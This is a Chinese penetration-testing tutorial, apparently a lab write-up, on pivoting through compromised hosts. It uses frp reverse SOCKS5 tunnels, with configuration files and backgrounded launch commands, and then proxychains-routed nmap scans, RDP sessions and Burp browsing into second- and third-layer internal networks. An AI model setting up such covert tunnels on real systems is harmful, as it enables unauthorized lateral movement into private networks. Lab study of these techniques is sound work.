文章目录
0x01背景介绍
- 0x01背景介绍
- 0x02 frp一层代理(反向)
- 服务端(server)
- 客户端 (client)
- 0x03 frp二层代理
- 客户端 (client)
- 0x04 测试连接
- 摘抄
假设:已经获取边界服务器(192.168.0.100)的服务器权限,win7服务器(192.168.52.30)的权限 实现:
- 配置一层代理,访问192.168.52.0/24网段,以便访问第二层网络(
192.168.52.30) - 配置二层代理,访问192.168.93.0/24网段,以便访问第三层网络(
192.168.93.30) - 现在 ubuntu(web1)要充当
frp客户端和frp服务端,以便访问第三层网络
kali(192.168.0.107)
frps.ini
--------------------------------------
[common]
#服务端监听端口,默认7000。监听来自客户端的流量请求
bind_port = 7000
--------------------------------------
启动
chmod +777 frps
./frps -c ./frps.ini
ubuntu-web1(192.168.0.100)
会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,
我们访问vps的7777端口就相当于访问客户端的7000端口
frpc.ini
---------------------
[common]
server_addr = 192.168.0.107
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
----------------------
启动
chmod +777 frpc
nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &
先启动服务器,在启动客户端
同时启动二层代理的服务端frps ubuntu-web1(192.168.0.100)
frps.ini
--------------------------------------
[common]
#服务端监听端口,默认7000。监听来自客户端的流量请求
bind_addr = 192.168.52.10
bind_port = 7000
--------------------------------------
启动
chmod +777 frps
./frps -c ./frps.ini
web-pc1(192.168.52.30)
会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,
我们访问vps的7777端口就相当于访问客户端的7000端口
frpc.ini
---------------------
[common]
server_addr = 192.168.52.10
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
----------------------
启动
chmod +777 frpc
nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &
kali本地添加proxy配置
vim /etc/proxychains4.conf
----------------------------------
socks5 192.168.0.107 7777
socks5 192.168.52.10 7777
----------------------------------
第一步 通过代理,使用nmap进行扫描
扫描二层网络
proxychains nmap -Pn -sT -sV -F -O 192.168.52.30
扫描三层网络
proxychains nmap -Pn -sT -sV -F -O 192.168.93.40
第二步 远程连接
proxychains rdesktop 192.168.52.30
proxychains rdesktop 192.168.93.40
第三步 浏览器开启代理,访问内网系统
访问二层网络
socks5 127.0.0.1 7777
http://192.168.52.30:8080/
访问三层网络
启动burp:
proxychains burpsuite
firfox代理:
socks5 127.0.0.1 7777
http 127.0.0.1 8080
访问网站:
http://192.168.52.30:8080/
127.0.0.1:7777--firxfox:8080---192.168.52.10:7777---burp127.0.0.0:8080----发送
使用代理启动burp 
浏览器开启burp代理 
成功访问 
查看后台burp的代理包
历尽千帆,归来仍是少年。经受风雨,坦荡而真诚,温暖而坚韧。 在生活里,明明白白做人,在工作上,勤勤恳恳努力。 不做玻璃心的花瓶,保持韧性,勤奋、坚持,用一颗真诚的心面对生活,才是一个人走向成功,能够屹立不倒的原因。
